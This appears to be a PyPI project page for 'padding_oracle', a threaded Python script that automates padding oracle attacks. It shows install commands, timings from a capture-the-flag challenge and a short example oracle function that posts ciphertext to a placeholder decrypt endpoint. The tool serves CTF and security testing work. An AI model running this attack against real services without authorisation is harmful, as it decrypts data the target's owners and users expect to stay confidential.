Threaded padding oracle automation.
Project description
padding_oracle.py
Extremely fast threaded padding oracle automation script for Python 3.
Install
Installing from PyPI:
pip3 install -U padding_oracle
Or, installing from GitHub:
pip3 install -U git+https://github.com/djosix/padding_oracle.py.git
Performance
Tested on [0x09] Cathub Party from EDU-CTF:
| Request Threads | Execution Time |
|---|---|
| 1 | 17m 43s |
| 4 | 5m 23s |
| 16 | 1m 20s |
| 64 | 56s |
Example
All you need is defining the oracle function to check whether the given cipher is correctly decrypted.
from padding_oracle import * import requests sess = requests.Session() def oracle(cipher): r = sess.post('http://some-website.com/decrypt', data={'cipher': base64_encode(cipher)}) assert 'SUCCESS' in r.text or 'FAILED' in r.text return 'SUCCESS' in r.text cipher = b'[ IV ][ Block 1 ][ Block 2 ]' plaintext = padding_oracle(cipher, # cipher bytes (required) 16, # block size (required) oracle, # oracle function (required) 64) # number of threads
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
| Filename, size | File type | Python version | Upload date | Hashes |
|---|---|---|---|---|
| Filename, size padding_oracle-0.1.5-py3-none-any.whl (6.3 kB) | File type Wheel | Python version py3 | Upload date | Hashes View hashes |
| Filename, size padding_oracle-0.1.5.tar.gz (4.4 kB) | File type Source | Python version None | Upload date | Hashes View hashes |
Close
Hashes for padding_oracle-0.1.5-py3-none-any.whl
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | 616543760dfb440d747982a84ad2056c0cf54d87394a8007f68b659a72a91863 |
|
| MD5 | e699caa271a9f4bb45a81aa25ad7f9a5 |
|
| BLAKE2-256 | da443c69edfb3d3fc2c2dfcbd40747a30ce52cb7e33d949816467e063ee9902b |
